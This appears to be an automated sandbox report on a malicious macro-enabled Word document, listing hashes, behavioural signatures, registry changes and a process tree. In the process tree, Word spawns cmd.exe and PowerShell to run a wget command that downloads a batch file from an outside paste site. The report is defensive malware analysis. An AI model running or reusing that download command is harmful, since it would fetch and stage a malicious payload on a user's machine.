Analysis
-
max time kernel
144s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-12-2023 15:47
Behavioral task
behavioral1
Sample
539ffa888e54851b971f1f5d92f75f72.docm
Resource
win7-20231215-en
windows7-x64
8 signatures
150 seconds
Behavioral task
behavioral2
Sample
539ffa888e54851b971f1f5d92f75f72.docm
Resource
win10v2004-20231201-en
windows10-2004-x64
0 signatures
150 seconds
General
-
Target
539ffa888e54851b971f1f5d92f75f72.docm
-
Size
96KB
-
MD5
539ffa888e54851b971f1f5d92f75f72
-
SHA1
05426efcdfb55bda58c9901095c5d685b142e65c
-
SHA256
e636d49d8e2ecb81e08a6d303ee2d07172a105566e68a113cb0cd2438dc40508
-
SHA512
d15bc949037234d46a89d8ffaac83a6aac7a01628a5ca30250040d2fe516dfcf708b57a9be697458545c5a206ee44087d995b35080949036b48ad553cf00c871
-
SSDEEP
1536:jA4ru4Lo30qCR3FU7lN9YDS47wWUyTiedpdMXqgZeNiufpBb/v:jA4pLoLCR3ulN9YJTUyGUM6NiufpBbn
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2428 2212 cmd.exe 16 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2980 2212 cmd.exe 16 -
Office loads VBA resources, possible macro or embedded object present
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2212 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2836 powershell.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2212 WINWORD.EXE 2212 WINWORD.EXE 2212 WINWORD.EXE 2212 WINWORD.EXE 2212 WINWORD.EXE 2212 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2212 wrote to memory of 2980 2212 WINWORD.EXE 29 PID 2212 wrote to memory of 2980 2212 WINWORD.EXE 29 PID 2212 wrote to memory of 2980 2212 WINWORD.EXE 29 PID 2212 wrote to memory of 2980 2212 WINWORD.EXE 29 PID 2212 wrote to memory of 2428 2212 WINWORD.EXE 28 PID 2212 wrote to memory of 2428 2212 WINWORD.EXE 28 PID 2212 wrote to memory of 2428 2212 WINWORD.EXE 28 PID 2212 wrote to memory of 2428 2212 WINWORD.EXE 28 PID 2428 wrote to memory of 2836 2428 cmd.exe 26 PID 2428 wrote to memory of 2836 2428 cmd.exe 26 PID 2428 wrote to memory of 2836 2428 cmd.exe 26 PID 2428 wrote to memory of 2836 2428 cmd.exe 26
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\539ffa888e54851b971f1f5d92f75f72.docm"1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\SysWOW64\cmd.execmd.exe /cpowershell wget -O C:\Data\batty.bat https://paste.c-net.org/BustinBeady2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2428
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c mkdir C:\Data2⤵
- Process spawned unexpected child process
PID:2980
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell wget -O C:\Data\batty.bat https://paste.c-net.org/BustinBeady1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2836